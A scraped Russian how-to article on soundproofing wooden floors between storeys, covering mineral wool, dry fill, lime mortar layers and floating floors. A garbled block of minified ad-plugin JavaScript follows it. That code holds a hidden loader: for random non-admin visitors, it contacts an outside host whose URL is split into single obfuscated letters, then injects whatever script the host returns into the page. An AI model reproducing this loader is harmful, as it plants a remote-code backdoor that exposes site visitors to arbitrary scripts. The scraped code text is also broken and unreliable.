44 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как сделать шумоизоляцию деревянного перекрытия

Как сделать шумоизоляцию деревянного перекрытия?

Деревянные перекрытия, установленные в частном доме или коттедже, имеют свои плюсы и минусы. К плюсам можно отнести экологические свойства древесины. Ее природное тепло, текстуру и запах. К тому же, при возведении перекрытия на деревянных балках не требуется применение специальной техники. Бревно – не бетонная плита, которую нужно поднимать и укладывать с помощью автокрана.

Минусы подобного перекрытия также вытекают из свойств древесины. Под воздействием температуры и влаги дерево способно «двигаться». В отличие от монолитного или плитного перекрытия, деревянное не является сплошным. Это означает, что тепло- и звукоизоляция деревянных перекрытий должна быть выполнена по всем правилам. Только тогда тепло и звук не будут проходить между этажами.

Выбор звукоизоляционного материала для перекрытий

Чтобы обеспечить лучшую защиту от шума и вибрации, звукоизоляция межэтажных деревянных перекрытий проводится с использованием нескольких видов изоляторов. Главное требование – высокий коэффициент звукопоглощения строительных материалов.

Звукоизоляция межэтажных деревянных перекрытий минватой В качестве основного звукоизолятора лучше отдать предпочтение волокнистым материалам, т.к. их структура способствует тому, что большинство звуков гасится о нее (т.е. происходит максимальное звукопоглощение).

Например, такими характеристиками обладает эковата, минеральная и базальтовая вата. К тому же, такой звукоизоляционный материал служит одновременно и утеплителем.

Стоит отметить, что все виды работ по звукоизоляции перекрытий должны выполняться на этапе строительства здания. Схема расположения материалов представлена на рисунке.

Устройство шумоизоляции на доски

В деревянных домах, где все напольные конструкции выполнены из досок, шумоизолятор кладут немного иначе. Существует 2 способа монтажа защитных материалов для пола:

  • на старое дощатое основание стелют выравнивающие поверхность листы фанеры, ДСП, ОСБ. Затем кладут слой изолятора с прослойкой гидро- и паронепроницаемого полотна. Верх закрывают теми же выравнивающими изделиями. Такой способ подходит для сильно повреждённых досок основания, где между отдельными половицами с течением времени образовались внушительные щели;
  • на старый деревянный настил разворачивают полиэтилен. Поверх него наливают полужидкий известковый раствор. Слой его должен быть не более 2 см. после его высыхания насыпают 3 см песка и снова заливают известью. Получается недорогая, но эффективная защита от шума.

Такая изоляция хорошо удерживает тепло в доме и позволяет создать комфортные условия на полу. Известковый раствор дополнительно дезинфицирует доски. Поэтому они не гниют, не покрываются плесенью и грибком.

Сухая стяжка под деревянный пол

В деревянных домах в качестве звукоизолирующего материала наиболее предпочтительно использование сухих компонентов (крамзита, вермикулита и др.). Они выполняют двойную функцию: служат основанием для досок финишного пола и предохраняют помещения от шума. Данный вариант подложки под финишщное покрытие создать несложно.

  • крупнофракционную смесь насыпают ровным слоем на очищенное от лишнего мусора основание и равномерно распределяют по всему периметру комнаты;
  • сверху кладут неплотно друг к другу плиты ОСБ, фанеры, гипсокартон или ДСП;
  • все стыки скрепляют саморезами;
  • затем стелют линолеум, ламинат или другой материал.

Данный способ создания шумоизоляции деревянного пола эффективен и доступен. Он не требует серьёзных материальных и трудовых затрат.

При покупке звукоизоляционных материалов обращают внимание на качество продукции. Некоторые синтетические изделия способны причинить вред здоровью человека. Чтобы не ошибиться с выбором и обезопасить себя и близких, нужно требовать от продавца сертификаты качества.

Шумоизоляция

Межэтажная звукоизоляция в деревянных перекрытиях стандартно имеет толщину от 15 см. При этом общая толщина перекрытия между этажами не менее 25 см. Конкретно для слоя волокнистого изолятора необходимо давать толщину не менее 10 см при плотности шумоизоляции от 50 кг/куб.м.

После монтажа балок и укладки плит минваты можно дополнительно уложить на пол рулонный, пробковый или войлочный настил. В коттеджах часто применяется минеральная мембрана. Правила монтажа мягких волокнистых материалов при укладке междуэтажной шумоизоляции:

  1. Набить рейки 40х50 мм на вертикальной части балки снизу.
  2. К рейкам нашить доски толщиной от 25 мм.
  3. Обернуть балку пароизоляцией, вывести кромку пароизоляции за стык балки со стеной на 10 см.
  4. Набить войлочные полосы на балку, можно использовать металлический, лучше пластмассовый крепеж.
  5. Плотно уложить блоки из волокнистого материала между балками.
  6. Расстелить войлочный настил поверх основы.

Независимо от материала, типа монтажа, деревянные перекрытия обрабатываются антисептиком, перед монтажом балки покрываются олифой и сушатся при комнатной температуре 48 часов.

Основная часть шумоизоляции межу этажами уложена. Снизу поверхность готова для обшивки гипсокартоном, вагонкой, другим материалом. Для обустройства пола необходимо дополнительно сверху на слой рулонного изолятора уложить теплоизол, если планируется основной пол из доски. Когда в качестве основного пола используют ламинат, теплоизол не применяют, в качестве подложки под плиты ламината используют фанеру.

Некоторые рекомендации по изготовлению плавающего пола

  1. Абсолютная звукоизоляция невозможна, так что ставить такую цель перед собой не стоит. Вполне достаточно, если имеющийся пол обеспечит комфортный уровень тишины.

Вполне достаточно, если имеющийся пол обеспечит комфортный уровень тишины

Звукоизоляционные мембраны Тексаунд. Гигиенический сертификат

Звукоизоляция деревянного дома отличается от аналогичных работ в кирпичных и бетонных зданиях. Эти отличия вызваны особенностями строения перекрытий и особенно – свойствами материала, из которого построен дом. Звукопроводящие характеристики дерева не позволяют пропустить такой этап строительства и ремонта.

К счастью, есть весьма действенные способы уменьшить проникновение звуковых колебаний между этажами в деревянных домах, и все, кто предпочитает подобные строения, могут наслаждаться спокойной и комфортной жизнью в своём доме.

Звукоизоляция пола и верхних перекрытий

Первый этаж

Звукоизоляция пола, как правило, закладывается на этапе возведения стяжки перекрытия. Об этом следует подумать заранее. Очень часто утепление и звукоизоляция совмещаются в виде одного материала, выполняющего обе функции. Например, стекловата обладает и тем и другим качеством. Поэтому пол утепляют именно этим материалом, так как он избавляет от необходимости приобретения отдельной шумоизоляции. Большой популярностью пользуется материал из базальтового волокна. Он практически не знает себе равных по поглощению звуков и удержанию тепла одновременно. В связи с этим этап утепления пола совпадает со звукоизоляцией, как таковой. Однако многие специалисты советуют для большего эффекта укладывать слой звукоизоляции под финальное напольное покрытие.

Эта дополнительная мера позволит полностью изолировать как ударные, так и акустические звуки. Выполняется дополнительная защита очень просто. На основании чистовой стяжки укладывают листы из пробкового материала или ДВП. Листы плотно пригоняются друг к другу и не крепятся к основанию. Почему не крепятся? Гвозди, саморезы и другие металлические элементы отлично проводят звук. Соответственно, прибивая листы, целесообразность всей конструкции теряется. Звук все равно будет проходить по металлическим элементам. Звукопоглощающие материалы не крепятся, получается «плавающее перекрытие». Далее на него укладывается финальное напольное покрытие. Двойная шумоизоляция, утеплитель и пробковый лист, способна заглушить ударные звуки.

Верхние перекрытия

Основание пола второго этажа – это конструкция в виде балок и перекрытий. Они крепятся на основные брусья. Звукоизоляция этих элементов начинается с мест соединений. Прокладываются узлы креплений рулонными материалами. Сами балки целесообразней укрыть войлоком или другим более пожаростойким материалом.

Дело в том, что со временем балки и доски начинают скрипеть. Если их «упаковать» в шумоизоляцию, звук не будет так слышен. Учитывайте этот момент при возведении второго этажа. Самым популярным и эффективным способом монтажа звукоизоляции верхних перекрытий является мембранный «второй потолок». Схема его возведения трудоемкая, но эффект от такой конструкции стоит того.

Суть метода сводится к обустройству «навесного потолка», сделанного из двух звукопоглощающих деревянных листов. Между ними находится звукоизолятор. Этот «бутерброд» подвешивается и прикрепляется к стенам. Получается своеобразная воздушная подушка, поглощающая и перераспределяющая поступающий звук. Самым важным моментом во всей конструкции является грамотное ее крепление. Мембранный звукоизолятор в деревянном доме крепится на стены по периметру.

Основная площадь прикрепляется к балкам с помощью виброгасящего подвеса. Его можно сделать самому или приобрести уже готовый. Крепить «навесную шумоизоляцию» напрямую нельзя, так как эффект будет утрачен по причине проводимости звука металлическим элементом. Конструкция должна крепиться отдельно и иметь независимый характер.

Звукоизоляция пола верхнего перекрытия может быть выполнена с помощью минеральной ваты и фанеры. Принцип этого способа такой же, как и у мембранного. Материал укладывается между балками и укрепляется листами фанеры. Конструкция крепится к стенам, но не к балкам. Она должна быть независимой от основного перекрытия. Вместо фанеры часто используют гипсокартон.

Особенности монтажа звукоизоляции

Важно запомнить, что звукоизоляция монтируется на этапе строительства при закладке перекрытий определенного этажа. Если же забыть о данном моменте, то в дальнейшем при необходимости произвести изоляцию полов придется выполнять демонтаж покрытий, что приведет к дополнительным расходам и повышению сроков работ.

Важно знать, что звукоизоляция пола в деревянном доме производится при помощи разнообразных материалов, которые выбираются в зависимости от потенциальных источников создающих шумы в доме:

  • ударная группа: шаги, стуки, удары об пол и т.д.;
  • звуки с акустической природой: телевизор, динамики, человеческий голос и т.д.;
  • звуки, создаваемые самой постройкой (структурные): скрип половиц, свист ветра и т.д.

Учтя данный параметр можно заранее подготовиться к покупке строительных материалов и сэкономить время на их выборе. Приобретать их лучше всего в специализированных магазинах, поскольку представленная там продукция имеет высшее качество. Сделав фото подготовленного участка пола после стяжки и произведя необходимые замеры можно получить помощь от продавца в выборе материала.

Первый шаг в укладке шумоизоляции

Строительство пола в деревянном доме сопровождается всевозможными соединительными узлами. Места крепления балок, их соприкосновение с дощатым покрытием, соединения брусьев – все эти узлы разносят звук по всем направлениям. Именно с них и начинается звукоизоляция. Самыми эффективными материалами по поглощению звука считаются мягкие волокнистые структуры. Они прекрасно справляются со своей задачей и легки в применении.

Соединительные конструкции и узлы прокладываются материалами, поглощающими звук. Многие мастера используют войлок для прокладки между перекрытиями. Он покрывает балки, места соединения перекрытий второго этажа, если он имеется. Также места креплений можно прокладывать прорезиненным материалом.

Звукоизоляция креплений и соединений деревянных элементов играет большую роль, так как ведущие балки распространяют звук вверх и по сторонам. Они являются коридором, по которому путешествует шум, особенно ударный. Целесообразней начинать возведение перекрытий уже с учетом природы звука и его распространения. В результате не придется вздрагивать от малейшего звука в помещении.

Учитывая моменты звукоизоляции соединительных узлов, последующее проведение защиты усилит эффект изолированных соединений перекрытий.

Что делать, если пол скрипит?

Чаще всего напольное покрытие из дерева скрипит из-за неровных досок и таких же кривых лаг и балок, а чтобы устранить такую проблему в доме, необходимо проделать следующие манипуляции:

  • строго выдержать горизонталь и уровень при укладке лаг и балок;
  • дощатый настил укладывать на одном уровне;
  • в работе использовать исключительно сухой материал, иначе доски от сырости могут выкручиваться и от этого издавать скрип.

Если вы своими руками укладываете ламинат или паркетную доску, контролируйте уровень настила из досок. Он должен быть уложен строго горизонтально, без малейших проседаний, также здесь не лишней будет пароизоляция.

Подробное руководство о том, как убрать скрип деревянного пола.

Прибегаем к помощи звукоизоляционных материалов

Чтобы усилить эффект шумоизоляции в доме, устраивают двойной пол или перекрытие с полым пространством, предназначенным для укладки изоляционного материала. Технология звукоизоляционного процесса двойного пола начинается с того, что на черновую основу укладывают раствор из глины или извести и дают ему высохнуть. Далее присыпают сухим песком или керамзитовым наполнителем до чистового настила. Сухую засыпку нужно залить раствором извести, а после его полного высыхания принимаются за чистовую отделку. В данном случае половину пространства между черновой основой и чистовым настилом занимают сухие компоненты, вторую половину заполняет воздух. Благодаря такому нехитрому способу шумоизоляция двойного пола и одновременно потолка на нижнем этаже существенно улучшится. Не забывайте перед монтажом паркета или ламината уложить пароизоляционный слой, что также положительно скажется на звукоизоляции перекрытий.

Звукоизоляция пола при помощи сыпучих материалов

Как говорилось ранее, в процессе строительства деревянного перекрытия, обычно в качестве звукоизоляции используют сухую засыпку, которую укладывают между черновым и чистовым полом. Обратите внимание, что накат необходимо сооружать прочным и ни в коем случае не тонким, чтобы он мог без проблем выдержать нагрузку от керамзита или песка. Доски настила закрепляют своими руками плотно друг к другу, но лучше использовать для этой цели щиты. Засыпка здесь может использоваться такая же, как и при укладке двойного пола. Если накат строили не из щитов, а из досок, необходимо его обрабатывать известковым раствором. Затем на высохшую поверхность или на щиты насыпают слой песка или керамзита. Как и в предыдущем случае, сухие компоненты пола должны наполовину заполнять пространство между накатом и настилом из досок. Засыпку также заливают разведенной известью. Чтобы одновременно шумоизоляция выполняла функцию утеплителя, то в качестве засыпки используют сыпучий утеплительный материал, который укладывается на рубероид.

Устройство «плавающего» пола

Это еще один эффективный вариант звукоизоляции в доме с деревянными перекрытиями, который осуществляется при помощи звукоизоляционных материалов и отлично справляется с поставленной задачей. К тому же перекрытие будет не таким тяжелым, как в случае с песчаной или керамзитовой засыпкой, и здесь дело не только в том, что сыпучие компоненты весят немало. Меньший вес будет обеспечен накатом меньшей толщины, ведь ему не нужно удерживать сухую засыпку.

Плавающей называют конструкцию пола потому, что точкой опоры для нее служит слой звукоизоляционного материала, а не жесткие элементы. В качестве изолятора можно использовать:

  • минеральную вату;
  • стекловату;
  • экструдированный пенополистирол и др.

Плавающий звукоизоляционный пол – простая схема

Рулонный мягкий материал выстилают сплошным укрытием на деревянные балки так, чтобы он слегка провисал между ними, и при этом не касался потолка нижнего уровня. Если один рулон изоляции не покрывает необходимое пространство, края смежных листов размещаются внахлест на 10 – 15 см, а ее края должны доставать до стен и немного выходить в пространство, образовавшееся между настилом из досок и стенами. Рассчитывая толщину звукоизоляции и зазор между крайней доской наката и стеной, следят за тем, чтобы крайний элемент настила плотно притиснул материал к стене, а закроется вата после монтажа плинтусов.

Плавающий звукоизоляционный пол – лучшая схема

Чтобы улучшить звукоизоляцию в доме, профессионалы советуют плинтус фиксировать к поверхности пола. Если у вас предусмотрена печь, то следите за тем, чтобы минеральная вата не касалась ее трубы. В этом районе шумоизоляция будет выполнена при помощи асбестового картона или войлока, обработанного глиняным раствором. Такой прием обеспечит защиту древесины от трубы, выдающей высокую температуру.

Этапы работ

  1. На первом этапе нужно избавиться от щелей и зазоров, которые передают звук. Если «плавающая» конструкция будет монтироваться своими руками на плотное основание, швы промазывают герметиком. Если настил совсем ветхий, можно этот этап пропустить.
  2. Все инженерные коммуникации, если они есть, обязательно оборачивают строительной пленкой и фиксируют скотчем.
  3. Следующим слоем должна быть пароизоляция, которая воспрепятствует проникновению влаги в структуру звукоизоляционного материала. Исключением будет только пенопласт – он не нуждается в защите. Правда пенопласт – далеко не самый лучший звукоизолятор.
  4. Рулонную изоляцию укладывают внахлест, чтобы она касалась стен. Если укладывается минвата или войлок, то на стенах предварительно закрепляют полосу звукоизоляции, которая по ширине будет не меньше, нежели толщина будущего пола. Таким образом мы получим своеобразную чашу, не позволяющую прикасаться жестким элементам к балкам и поверхности стен.
  5. После укладки лаг должна образоваться сетчатая конструкция, благодаря которой достигается необходимая жесткость, и полы во время эксплуатации не будут прогибаться. Здесь без жесткости не обойтись, так как «плавающий» пол подразумевает свободное положение, когда лаги не фиксируются к поверхности балок, и благодаря этому нет мостика передачи шума.
  6. На лаги укладывается слой звукоизоляционного материала.
  7. На лаги крепятся доски или фанера. Чтобы улучшить черновое покрытие в доме, сверху можно постелить листы OSB. Следите за тем, чтобы звукоизоляция была плотно прижата к стене.
  8. Монтируется финишное покрытие, под которое расстилается подложка.
  9. Устанавливается плинтус, но перед этим срезается полоса звукоизоляции, которая торчит из зазора между стеной и полом. Ее остатки закроются плинтусом, фиксирующимся на выбор к полу или стене.

Правильно выполненный «плавающий» пол своими руками отличается легкостью, отлично справляется с поглощением шумов, а также удерживает тепло. Благодаря равномерно распределенной нагрузке, отсутствию жестких соединений, а также наличию качественных материалов, такая конструкция пола прослужит долго и создаст в доме отличную атмосферу.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};